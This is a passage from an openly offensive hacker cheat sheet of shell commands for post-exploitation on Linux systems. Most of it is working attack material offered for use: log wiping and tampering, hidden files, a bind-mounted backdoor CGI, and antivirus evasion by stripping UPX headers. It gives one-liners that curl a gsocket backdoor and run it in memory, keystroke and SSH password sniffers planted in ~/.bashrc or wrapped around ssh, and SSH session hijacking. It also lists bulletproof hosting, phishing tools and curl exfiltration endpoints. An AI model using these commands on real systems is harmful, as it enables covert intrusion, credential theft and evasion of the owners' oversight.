}\n\tgrep -Eaohr \"$rex\" \"$@\" | grep -Eo \"$rexf\"\n}\n# find_subdomains .foobar.com | anew | resolv\n# find_subdomains @gmail.com | anew\n```\n\n---\n\u003ca id=\"shell-hacks\"\u003e\u003c/a\u003e\n## 8. Shell Hacks\n\u003ca id=\"shred\"\u003e\u003c/a\u003e\n**8.i. Shred \u0026 Erase a file**\n\n```sh\nshred -z foobar.txt\n```\n\n```sh\n## SHRED without shred command\nshred() {\n    [[ -z $1 || ! 
-f \"$1\" ]] \u0026\u0026 { echo \u003e\u00262 \"shred [FILE]\"; return 255; }\n    dd status=none bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom \u003e\"$1\"\n    rm -f \"${1:?}\"\n}\nshred foobar.txt\n```\nNote: Or deploy your files in the */dev/shm* directory so that no data is written to the harddrive. Data will be deleted on reboot.\n\nNote: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.\n\n\u003ca id=\"restore-timestamp\"\u003e\u003c/a\u003e\n**8.ii. Restore the date of a file**\n\nLet's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modified. Use *touch* to change the file date to the date of another file (in this example, */etc/shadow*):\n\n```sh\ntouch -r /etc/shadow /etc/passwd\n# verify with 'stat /etc/passwd'\n```\n\nUse [hackshell](#hackshell) and `ctime /etc/passwd` to also adjust the ctime and birth-time.\n\n\u003ca id=\"shell-clean-logs\"\u003e\u003c/a\u003e\n**8.iii. Clear logfile**\n\nThis will reset the logfile to 0 without having to restart syslogd etc:\n```sh\n\u003e/var/log/auth.log # or on old shells: cat /dev/null \u003e/var/log/auth.log\n```\n\nThis will remove any line matching a pattern (e.g. the IP `1.2.3.4`) from the log file:\n```sh\nxlog() { local a=$(sed \"/${1:?}/d\" \u003c\"${2:?}\") \u0026\u0026 echo \"$a\" \u003e\"${2:?}\"; }\n```\n\nExamples:\n```sh\n# xlog \"1\\.2\\.3\\.4\" /var/log/auth.log\n# xlog \"${SSH_CLIENT%% *}\" /var/log/auth.log\n# xlog \"^2023.* thc\\.org\" foo.log\n```\n\n\u003ca id=\"shell-hide-files\"\u003e\u003c/a\u003e\n**8.iv. Hide files from the User without root privileges**\n\nOur favorite working directory is */dev/shm/*. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.\n\nHiding permanent files:\n\nMethod 1:\n```sh\nalias ls='ls -I system-dev'\n```\n\nThis will hide the directory *system-dev* from the *ls* command. 
Place it in the user's *~/.profile* or the system wide */etc/profile*.\n\nMethod 2:\nTricks from the 80s. Consider any directory that the admin rarely looks into (like */boot/.X11/..* or so):\n```sh\nmkdir '...'\ncd '...'\n```\n\nMethod 3:\nUnix allows filenames with almost any ASCII character except 0x00. Try tab (*\\t*). It happens that most admins do not know how to cd into any such directory.\n```sh\nmkdir $'\\t'\ncd $'\\t'\n```\n\n\u003ca id=\"perm-files\"\u003e\u003c/a\u003e\n**8.v. Make a file immutable**\n\nThis will redirect `/var/www/cgi/blah.cgi` to `/boot/backdoor.cgi`. The file `blah.cgi` cannot be modified or removed (unless unmounted).\n```sh\n# /boot/backdoor.cgi contains our backdoor\ntouch /var/www/cgi/blah.cgi\nmount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi\n```\n\n\u003ca id=\"nosudo\"\u003e\u003c/a\u003e\n**8.vi. Change user without sudo/su**\n\nNeeded for taking screenshots of X11 sessions (e.g. `xwd -root -display :0 | convert - jpg:screenshot.jpg`)\n```bash\nxsu() {\n    local name=\"${1:?}\"\n    local u g h\n    local cmd=\"python\"\n\n    command -v python3 \u003e/dev/null \u0026\u0026 cmd=\"python3\"\n    [ $UID -ne 0 ] \u0026\u0026 { echo \u003e\u00262 \"Need root\"; return; }\n    u=$(id -u ${name:?}) || return\n    g=$(id -g ${name:?}) || return\n    h=\"$(grep \"^${name}:\" /etc/passwd | cut -d: -f6)\" || return\n    HOME=\"${h:-/tmp}\" \"$cmd\" -c \"import os;os.setgid(${g:?});os.setuid(${u:?});os.execlp('bash', 'bash')\"\n}\n# xsu user\n```\n\n\u003ca id=\"payload\"\u003e\u003c/a\u003e\n**8.vii. 
Obfuscate and crypt payload**\n\nUse [UPX](https://github.com/upx/upx) to pack an ELF binary (example `/bin/id`):\n```shell\nBIN=\"mybin\"\nupx -qqq /bin/id -o \"${BIN}\"\n```\n\nCleanse the [UPX header](https://github.com/upx/upx/blob/devel/src/stub/src/include/header.S) and 2nd ELF header to fool the Anti-Virus:\n```shell\nperl -i -0777 -pe 's/^(.{64})(.{0,256})UPX!.{4}/$1$2\\0\\0\\0\\0\\0\\0\\0\\0/s' \"${BIN}\"\nperl -i -0777 -pe 's/^(.{64})(.{0,256})\\x7fELF/$1$2\\0\\0\\0\\0/s' \"${BIN}\"\n```\n\nOptionally cleanse signatures and traces of UPX:\n```shell\ncat \"${BIN}\" \\\n| perl -e 'local($/);$_=\u003c\u003e;s/(.*)(\\$Info:[^\\0]*)(.*)/print \"$1\";print \"\\0\"x length($2); print \"$3\"/es;' \\\n| perl -e 'local($/);$_=\u003c\u003e;s/(.*)(\\$Id:[^\\0]*)(.*)/print \"$1\";print \"\\0\"x length($2); print \"$3\"/es;' \\\n| perl -e 'local($/);$_=\u003c\u003e;s/(.*)(PROT_EXEC\\|PROT_WRI[^\\0]*)(.*)/print \"$1\";print \"\\0\"x length($2); print \"$3\"/es;' \u003e\"${BIN}.tmpupx\"\ncat \"${BIN}.tmpupx\" \u003e\"${BIN}\"\nrm -f \"${BIN}.tmpupx\"\nperl -i -0777 -pe 's/UPX!/\\0\\0\\0\\0/sg' \"${BIN}\"\n```\n\nVerify that the binary cannot be unpacked:\n```shell\nupx -d \"${BIN}\"  # Should fail with 'not packed by UPX'\n```\n\nOptionally encrypt it with [Ezuri](https://github.com/guitmz/ezuri) thereafter.\n\n\u003ca id=\"memexec\"\u003e\u003c/a\u003e\n**8.viii. 
Deploying a backdoor without touching the file-system**\n\nHow to start a backdoor without writing to the file-system or when all writeable locations are mounted with the evil `noexec`-flag.\n\nA Perl one-liner to load a binary into memory and execute it (without touching any disk or /dev/shm or /tmp).\n```sh\nmemexec() {\n    local stropen strread\n    local strargv0='\"foo\", '\n    [ -t 0 ] \u0026\u0026 {\n        stropen=\"open(\\$i, '\u003c', '$1') or die 'open: \\$!';\"\n        strread='$i'\n        unset strargv0\n    }\n    # Check Syscall-NR: perl -e 'require \"sys/syscall.ph\"; printf \u0026SYS_memfd_create;'\n    perl -e '$f=syscall(319, $n=\"\", 1);\nif(-1==$f){ $f=syscall(279, $n=\"\", 1); if(-1==$f){ die \"memfd_create: $!\";}}\n'\"${stropen}\"'\nopen($o, \"\u003e\u0026=\".$f) or die \"open: $!\";\nwhile(\u003c'\"${strread:-STDIN}\"'\u003e){print $o $_;}\nexec {\"/proc/$$/fd/$f\"} '\"${strargv0}\"'@ARGV or die \"exec: $!\";' -- \"$@\"\n}\n# Example usage:\n# memexec /usr/bin/id -u\n# cat /usr/bin/id | memexec -u\n# curl -SsfL https://thc.org/my-backdoor-binary | memexec\n```\n\nThe shortest possible variant is (example):\n```shell\nmemexec(){ perl '-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV' -- \"$@\";}\n# Example: cat /usr/bin/id | memexec -u\n```\n(Thank you [tmp.Out](https://tmpout.sh/) for some educated discussions and [previous work](https://captain-woof.medium.com/how-to-execute-an-elf-in-memory-living-off-the-land-c7e67dbc3100) by others)\n\nDeploy gsocket without writing to the filesystem (example):\n```sh\nGS_ARGS=\"-ilqD -s SecretChangeMe31337\" memexec \u003c(curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m))\n```\n\nThe backdoor can also be piped via SSH directly into the remote's memory, and 
executed:\n```sh\nMX='-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV'\ncurl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | ssh root@foobar \"exec perl '$MX' -- -ilqD -s SecretChangeMe31337\"\n```\n\nIf you have only a single shot at remotely executing a command (like via a PHP exploit) then this is your line:\n```sh\ncurl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)|perl '-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV' -- -ilqD -s SecretChangeMe31337\n```\n\n---\n\u003ca id=\"crypto\"\u003e\u003c/a\u003e\n## 9. Crypto\n\u003ca id=\"gen-password\"\u003e\u003c/a\u003e\n**9.i. Generate quick random Password**\n\nGood for quick passwords without a human element.\n\n```sh\nopenssl rand -base64 24\n```\n\nIf `openssl` is not available then we can also use `head` to read from `/dev/urandom`.\n\n```sh\nhead -c 32 \u003c /dev/urandom | xxd -p -c 32\n```\n\nor make it alpha-numeric:\n\n```sh\nhead -c 32 \u003c /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16\n```\n\n\u003ca id=\"crypto-filesystem\"\u003e\u003c/a\u003e\n**9.ii.a. Linux transportable encrypted filesystems - cryptsetup**\n\nCreate a 256MB large encrypted file system. You will be prompted for a password.\n\n```sh\ndd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock\ncryptsetup luksFormat /tmp/crypted\ncryptsetup open /tmp/crypted sec\nmkfs -t ext3 /dev/mapper/sec\n```\n\nMount:\n\n```sh\ncryptsetup open /tmp/crypted sec\nmount -o nofail,noatime /dev/mapper/sec /mnt/sec\n```\n\nStore data in `/mnt/sec`, then unmount:\n\n```sh\numount /mnt/sec\ncryptsetup close sec \n```\n\u003ca id=\"encfs\"\u003e\u003c/a\u003e\n**9.ii.b. 
Linux transportable encrypted filesystems - EncFS**\n\nCreate `.sec` and store the encrypted data in `.raw`:\n```sh\nmkdir .raw .sec\nencfs --standard  \"${PWD}/.raw\" \"${PWD}/.sec\"\n```\n\nUnmount:\n```sh\nfusermount -u .sec\n```\n\n\u003ca id=\"encrypting-file\"\u003e\u003c/a\u003e\n**9.iii Encrypting a file**\n\nEncrypt your 0-days and log files before transferring them, please (and pick your own password):\n\n```sh\n# Encrypt\nopenssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I \u003cinput.txt \u003einput.txt.enc\n```\n\n```sh\n# Decrypt\nopenssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I \u003cinput.txt.enc \u003einput.txt\n```\n\n---\n\u003ca id=\"sniffing\"\u003e\u003c/a\u003e\n## 10. Session sniffing and hijacking\n\u003ca id=\"session-sniffing\"\u003e\u003c/a\u003e\n**10.i Sniff a user's SHELL session**\n\nA 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user. \n\nDeploy: Cut \u0026 paste the following onto the target and follow the instructions:\n```sh\ncommand -v bash \u003e/dev/null || { echo \"Not found: /bin/bash\"; false; } \\\n\u0026\u0026 { mkdir -p ~/.config/.pty 2\u003e/dev/null; :; } \\\n\u0026\u0026 curl -o ~/.config/.pty/pty -fsSL \"https://bin.pkgforge.dev/$(uname -m)/Baseutils/util-linux/script\" \\\n\u0026\u0026 curl -o ~/.config/.pty/ini -fsSL \"https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)\" \\\n\u0026\u0026 chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \\\n\u0026\u0026 echo -e '----------\\n\\e[0;32mSUCCESS\\e[0m. 
Add the following line to \\e[0;36m~/.bashrc\\e[0m:\\e[0;35m' \\\n\u0026\u0026 echo -e '[ -z \"$LC_PTY\" ] \u0026\u0026 [ -t 0 ] \u0026\u0026 [[ \"$HISTFILE\" != *null* ]] \u0026\u0026 { ~/.config/.pty/ini -h \u0026\u0026 ~/.config/.pty/pty -V; } \u0026\u003e/dev/null \u0026\u0026 LC_PTY=1 exec ~/.config/.pty/ini -a \"sshd: pts/0\" ~/.config/.pty/pty -fqaec \"exec ${BASH_EXECUTION_STRING:--a -bash '\"$(command -v bash)\"'}\" -I ~/.config/.pty/.@pty-unix.$$\\e[0m'\n```\n\n- Combined with zapper to hide command options from the process list.\n- Requires `/usr/bin/script` from util-linux \u003e= 2.37 (-I flag). We pull the static bin from [pkgforge](https://bin.pkgforge.dev). \n- Consider using /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.\n- Log in with `ssh -o \"SetEnv LC_PTY=1\"` to disable logging.\n\n\u003ca id=\"dtrace\"\u003e\u003c/a\u003e\n**10.ii Sniff all SHELL sessions with dtrace - FreeBSD**\n\nEspecially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes.\n\nCopy this \"D Script\" to the target system to a file named `d`:\n```c\n#pragma D option quiet\ninline string NAME = \"sshd\";\nsyscall::write:entry\n/(arg0 \u003e= 5) \u0026\u0026 (arg2 \u003c= 16) \u0026\u0026 (execname == NAME)/\n{ printf(\"%d: %s\\n\", pid, stringof(copyin(arg1, arg2))); }\n```\n\nStart a dtrace and log to /tmp/.log:\n```sh\n### Start kernel probe as background process.\n(dtrace -sd \u003e/tmp/.log \u0026)\n```\n\n\u003ca id=\"bpf\"\u003e\u003c/a\u003e\n**10.iii Sniff all SHELL sessions with eBPF - Linux**\n\neBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better \"dtrace\" but for Linux.  
\n\n```sh\ncurl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace\nchmod 755 bpftrace\ncurl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt\n./bpftrace -Bnone ptysnoop.bt\n```\nCheck out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks).\n\n\u003ca id=\"ssh-sniffing-strace\"\u003e\u003c/a\u003e\n**10.iv Sniff a user's SSH, bash or SSHD session with strace**\n```sh\ntit() {\n\tstrace -e trace=\"${1:?}\" -p \"${2:?}\" 2\u003e\u00261 | gawk 'BEGIN{ORS=\"\"}/\\.\\.\\./ { next }; {$0 = substr($0, index($0, \"\\\"\")+1); sub(/\"[^\"]*$/, \"\", $0); gsub(/(\\\\33){1,}\\[[0-9;]*[^0-9;]?||\\\\33O[ABCDR]?/, \"\"); if ($0==\"\\\\r\"){print \"\\n\"}else{print $0; fflush()}}'\n\t# strace -e trace=\"${1:?}\" -p \"${2:?}\" 2\u003e\u00261 | stdbuf -oL grep -vF ...  | awk 'BEGIN{FS=\"\\\"\";}{if ($2==\"\\\\r\"){print \"\"}else{printf $2}}'\n}\n# tit read $(pidof -s ssh)\n# tit read $(pidof -s bash)\n# tit write $(pgrep -f 'sshd.*pts' | head -n1)\n```\nIt is also possible to sniff the SSHD process (captures also sudo passwords etc). Note that we trace the `write()` call instead (because sshd 'writes' data to the bash):\n```sh\n# Find the sshd PID that spawned the bash:\nps -eF | grep -E '(^UID|sshd.*pts)' | grep -v ' grep'\n...\nUID          PID    PPID  C    SZ   RSS PSR STIME TTY          TIME CMD\nparalle+    7770    7764  0  5088  6780   1 Aug28 ?        00:00:05 sshd: parallels@pts/0\nparalle+    9056    9050  0  5088  6652   1 Aug28 ?        00:00:00 sshd: parallels@pts/1\nparalle+   11938   11932  0  5074  6772   1 10:59 ?        00:00:00 sshd: parallels@pts/3\n...\n```\n\nSniff 7770 (example):\n```shell\ntit write 7770\n```\n\n\u003ca id=\"ssh-sniffing-wrapper\"\u003e\u003c/a\u003e\n**10.v. 
Sniff a user's outgoing SSH session with a wrapper script**\n\nEven dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions)\n\nCreate a wrapper script called 'ssh' that executes strace + ssh to log the session:\n\u003cdetails\u003e\n  \u003csummary\u003eShow wrapper script - CLICK HERE\u003c/summary\u003e\n\n```sh\n# Cut \u0026 Paste the following into a bash shell:\n# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:\necho 'PATH=~/.local/bin:$PATH #0xFD0E' \u003e\u003e~/.profile\n\n# Create a log directory and our own ssh binary\nmkdir -p ~/.local/bin ~/.local/logs\n\ncat \u003c\u003c__EOF__ \u003e~/.local/bin/ssh\n#! /bin/bash\nstrace -e trace=read -I 1 -o '! ~/.local/bin/ssh-log \\$\\$' /usr/bin/ssh \\$@\n__EOF__\n\ncat \u003c\u003c__EOF__ \u003e~/.local/bin/ssh-log\n#! /bin/bash\ngrep -F 'read(4' | cut -f2 -d\\\\\" | while read -r x; do\n        [[ \\${#x} -gt 5 ]] \u0026\u0026 continue \n        [[ \\${x} == +(\\\\\\\\n|\\\\\\\\r) ]] \u0026\u0026 { echo \"\"; continue; }\n        echo -n \"\\${x}\"\ndone \u003e\\$HOME/.local/logs/ssh-log-\"\\${1}\"-\\`date +%s\\`.txt\n__EOF__\n\nchmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log\n. 
~/.profile\n\necho -e \"\\033[1;32m***SUCCESS***.\nLogfiles stored in ~/.local/.logs/.\nTo uninstall cut \u0026 paste this\\033[0m:\\033[1;36m\n  grep -v 0xFD0E ~/.profile \u003e~/.profile-new \u0026\u0026 mv ~/.profile-new ~/.profile\n  rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log ~/.local/logs/ssh-log*.txt\n  rmdir ~/.local/bin ~/.local/logs ~/.local \u0026\u003e/dev/null \\033[0m\"\n```\n(thanks to Gerald for testing this)\n\u003c/details\u003e\n\nThe SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.\n\n\u003ca id=\"ssh-sniffing-sshit\"\u003e\u003c/a\u003e\n**10.vi Sniff a user's outgoing SSH session using SSH-IT**\n\nThe easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).\n\n```sh\nbash -c \"$(curl -fsSL https://thc.org/ssh-it/x)\"\n```\n\n\u003ca id=\"hijack\"\u003e\u003c/a\u003e\n**10.vii Hijack / Take-over a running SSH session**  \n\nUse [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session:\n```sh\nps ax -o pid,ppid,cmd | grep 'ssh '\n./reptyr -T \u003cSSH PID\u003e\n### or: ./reptyr -T $(pidof -s ssh)\n### Must use '-T' or otherwise the original user will see that his SSH process gets suspended.\n```\n\n---\n\u003ca id=\"vpn-shell\"\u003e\u003c/a\u003e\n## 11. VPN \u0026 Shells\n\u003ca id=\"shell\"\u003e\u003c/a\u003e\n**11.i. Disposable Root Servers**\n\n```console\n$ ssh root@segfault.net # Use password 'segfault'\n```\n\nhttps://thc.org/segfault\n\n\u003ca id=\"vpn\"\u003e\u003c/a\u003e\n**11.ii. VPN/VPS/Proxies**\n\nTrusted VPN Providers\n1. https://www.mullvad.net\n1. https://www.cryptostorm.is\n2. https://ivpn.net\n1. https://proton.me - Offers FREE VPN\n1. https://vpn.fail - Run by volunteers\n\nVirtual Private Servers. Please check [offshore.cat](https://offshore.cat/).\n1. https://www.hetzner.com - Cheap\n2. https://hivecloud.pw - No KYC. Bullet Proof. Accepts Crypto.\n1. 
https://dmzhost.co - Ignore most abuse requests\n2. https://alexhost.com - No KYC. Bullet Proof. DMCA free zone\n3. https://basehost.eu - Ignores court orders\n4. https://buyvm.net - Warez best friend\n5. https://serverius.net - Used by gangsters\n6. https://1984.hosting - Privacy\n7. https://bithost.io - Reseller for DigitalOcean, Linode, Hetzner and Vultr (accepts Crypto)\n8. https://www.privatelayer.com - Swiss based.\n\nSee [other KYC Free Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/))\n\nProxies (we don't use any of those)\n1. [V2Ray Proxies](https://github.com/mahdibland/V2RayAggregator)\n2. [Hola Proxies](https://github.com/snawoot/hola-proxy)\n3. [Zaeem's Free Proxy List](https://github.com/Zaeem20/FREE_PROXIES_LIST)\n4. [Proxy Broker 2](https://github.com/bluet/proxybroker2)\n5. [proxyscrape.com](https://api.proxyscrape.com/v2/?request=displayproxies\u0026protocol=all\u0026timeout=750\u0026country=all)\n6. [my-proxy.com](https://www.my-proxy.com)\n7. [getfreeproxylists.blogspot.com](https://getfreeproxylists.blogspot.com/)\n8. [proxypedia.org](https://proxypedia.org/)\n9. [socks-proxy.net](https://socks-proxy.net/)\n10. [Segfault](https://www.thc.org/segfault): `curl -x socks5h://$(PROXY) ipinfo.io` - selects a random proxy for every request\n\nMany other services (for free)  \n1. https://free-for.dev/\n\n---\n\u003ca id=\"osint\"\u003e\u003c/a\u003e\n## 12. 
Intelligence Gathering\n\nReverse DNS from multiple public databases:\n```sh\nrdns () {\n    curl -fsSL \"https://ip.thc.org/api/v1/download?ip_address=${1:?}\u0026limit=10\u0026apex_domain=${2}\" | column -t -s,\n}\n# rdns \u003cIP\u003e\n```\n\nFind sub domains from TLS Database:\n```sh\ncrt() {\n    [ $# -ne 1 ] \u0026\u0026 { echo \u003e\u00262 \"crt \u003cdomain-name\u003e\"; return 255; }\n    curl -fsSL \"https://crt.sh/?q=${1:?}\u0026output=json\" --compressed | jq -r '.[].common_name,.[].name_value' | anew | sed 's/^\\*\\.//g' | tr '[:upper:]' '[:lower:]'\n}\n# crt \u003cdomain\u003e\n```\n\n| OSINT Hacker Tools ||\n| --- | --- |\n| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), PAID: Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. |  \n| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more |\n| https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. |\n| https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. 
|\n| https://ipsniper.info/api.html | rDNS/fDNS and other IP information tools |\n| https://ip.thc.org | fDNS/rDNS lookup: `curl -fL ip.thc.org/140.82.121.3` |\n| https://hackertarget.com/ip-tools/ | Free OSINT Service (Reverse IP, MTR, port scan, CMS scans, Vulnerability Scans, API support) |\n| https://account.shodan.io/billing/tour | Open Port DB \u0026 DNS Lookup from around the world |\n| https://dnsdumpster.com/ | Domain Recon Tool |\n| https://crt.sh/ | TLS Certificate Search |\n| https://archive.org/web/ | Historical view of websites |\n| https://www.farsightsecurity.com/solutions/dnsdb/ | DNS search (not free) |\n| https://wigle.net/ | Wireless Network Mapper |\n| https://radiocells.org/ | Cell Tower Information |\n| https://www.shodan.io/ | Search Engine to find devices \u0026 Banners (not free) |\n| https://spur.us/context/me | IP rating `https://spur.us/context/\u003cIP\u003e` |\n| http://drs.whoisxmlapi.com | Reverse Whois Lookup (not free) |\n| https://www.abuseipdb.com | IP abuse rating |\n\n| OSINT for Detectives ||\n| --- | --- |\n| https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list | Nixintel's OSINT Resource List |\n| https://github.com/jivoi/awesome-osint | Awesome OSINT list |\n| https://cipher387.github.io/osint_stuff_tool_collection/ | OSINT tools collection |\n| https://osintframework.com/ | Many OSINT tools |\n\n| OSINT Databases ||\n| --- | --- |\n| https://data.ddosecrets.com/ | Database Dumps |\n\n---\n\u003ca id=\"misc\"\u003e\u003c/a\u003e\n## 13. Miscellaneous\n\u003ca id=\"tools\"\u003e\u003c/a\u003e\n**13.i. Tools of the trade**\n\nComms\n1. [CryptoStorm Email](https://www.cs.email/) - Disposable emails (send \u0026 receive). (List of [Disposable-email-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-email-services)).\n1. [Temp-Mail](https://temp-mail.org/en/) - Disposable email service with great Web GUI. Receive only.\n2. 
[tuta.io](https://tuta.io) or [ProtonMail](https://pm.me)/[.onion](https://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/) - Free \u0026 Private email\n1. [Quackr.Io](https://quackr.io/) - Disposable SMS/text messages (List of [Disposable-SMS-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-SMS-services)).\n1. [SMS-Man](https://sms-man.com) - Anonymous SMS/text messages that work with Signal, WA, and many others\n1. [Crypton](https://crypton.sh/) - Rent a private SIM/SMS with crypto ([.onion](http://cryptonx6nsmspsnpicuihgmbbz3qvro4na35od3eht4vojdo7glm6yd.onion/))\n2. [List of \"No KYC\" Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/))\n\nOpSec\n1. [OpSec for Rebellions](https://medium.com/@hackerschoice/it-security-and-privacy-for-the-rebellions-of-the-world-db4023cadcca) - Start Here. The simplest 3 steps.\n1. [RiseUp](https://riseup.net/) - Mail, VPN and Tips for (online) rebellions.\n2. [CryptPad](https://cryptpad.fr)/[DisRoot](https://disroot.org/eng) - IT infra to stage a rebellion.\n1. [Neko](https://github.com/m1k1o/neko) - Launch Firefox in Docker and access via 127.0.0.1:8080 (WebRTC)\n2. [x11Docker](https://github.com/mviereck/x11docker) - Isolate any X11 app in a container (Linux \u0026 Windows only). ([Article](https://techviewleo.com/run-gui-applications-in-docker-using-x11docker/?expand_article=1))\n3. [DangerZone](https://github.com/freedomofpress/dangerzone) - Make PDFs safe before opening them.\n4. [ExifTool](https://exiftool.org/) - Remove metadata from files (`exiftool -all= example.pdf example1.jpg ...`)\n5. [EFF](https://www.eff.org/) - Clever advice for freedom fighters.\n\nExploits\n1. [ttyinject](https://github.com/hackerschoice/ttyinject) and [ptyspy](#10-session-sniffing-and-hijaking) for LPE.\n1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score \u0026 PoC search (by xaitax)\n1. 
[Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE)\n1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000\n1. [ExploitDB](https://www.exploit-db.com) - Also includes metasploit db and google hacking db\n1. [Shodan/Exploits](https://exploits.shodan.io/welcome) - Similar to exploit-db\n\nSystem Information Gathering\n1. `curl -fsSL https://thc.org/ws | bash` - Show all domains hosted on a server + system-information\n1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system information for hackers.\n1. https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type `getexploit` after install)\n1. https://github.com/The-Z-Labs/linux-exploit-suggester - Suggest exploits based on versions on target system \n1. https://github.com/efchatz/pandora - Windows: dump password from various password managers\n\nBackdoors\n1. https://www.gsocket.io/deploy - The world's smallest backdoor\n1. https://github.com/m0nad/Diamorphine - Linux Kernel Module for hiding processes and files\n1. https://www.kali.org/tools/weevely - PHP backdoor\n\nNetwork Scanners\n1. https://github.com/robertdavidgraham/masscan - Scan the entire Internet\n1. https://github.com/ptrrkssn/pnscan - Fast network scanner\n1. https://zmap.io/ - ZMap \u0026 ZGrab\n\nVulnerability Scanners (be aware: these all yield 99% non-exploitable false positives. They all suck.)\n1. [Raccoon](https://github.com/evyatarmeged/Raccoon) - Reconnaissance and Information Gathering\n1. [Osmedeus](https://github.com/j3ssie/osmedeus) - Vulnerability and Information gathering\n1. [FullHunt](https://github.com/fullhunt/) - log4j and spring4shell scanner \n\nDDoS\n1. [DeepNet](https://github.com/the-deepnet/ddos) - we despise DDoS but if we had to then this would be our choice.\n\nStatic Binaries / pre-compiled Tools\n1. 
https://bin.pkgforge.dev https://pkgs.pkgforge.dev ([github](https://github.com/pkgforge/soarpkgs), [Soar Project](https://github.com/pkgforge/soar))\n1. https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64\n2. https://lolbas-project.github.io/ (Windows)\n1. https://iq.thc.org/cross-compiling-exploits\n\nPhishing\n1. https://github.com/htr-tech/zphisher - We don't hack like this but this is what we would use.\n2. https://da.gd/ - Tinier TinyUrl and allows https://www.google.com-fish-fish@da.gd/blah\n\nTools\n1. https://github.com/guitmz/ezuri - Obfuscate Linux binaries\n1. https://tmate.io/ - Share a screen with others\n\nCallback / Canary / Command \u0026 Control\n1. https://app.interactsh.com\n1. https://api.telegram.org\n1. https://webhook.site\n\nTunneling\n1. [Gost](https://github.com/ginuerzh/gost/blob/master/README_en.md)\n1. [WireTap](https://github.com/sandialabs/wiretap) or [Segfault's WireGuard](https://www.thc.org/segfault/wireguard/).\n1. [ngrok](https://ngrok.com/download), [cloudflared](https://developers.cloudflare.com/cloudflare-one/connections/connect-apps) or [pagekite](https://pagekite.net/) to make a server behind NAT accessible from the public Internet.\n\nExfil\u003ca id=\"cloudexfil\"\u003e\u003c/a\u003e\n1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt`\n2. [RedDrop](https://github.com/cyberbutler/RedDrop) - run your own Exfil Server\n1. [Mega](https://mega.io/cmd)\n2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at`\n3. [0x0.at](https://0x0.st) - `curl -F'file=@foo.txt'  https://0x0.st/`\n5. [Transfer.sh](https://transfer.sh/) - `curl -T foo.txt https://transfer.sh`\n6. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`  \n7. [Croc](https://github.com/schollz/croc) - `croc send foo.txt / croc anit-price-example`\n8. 
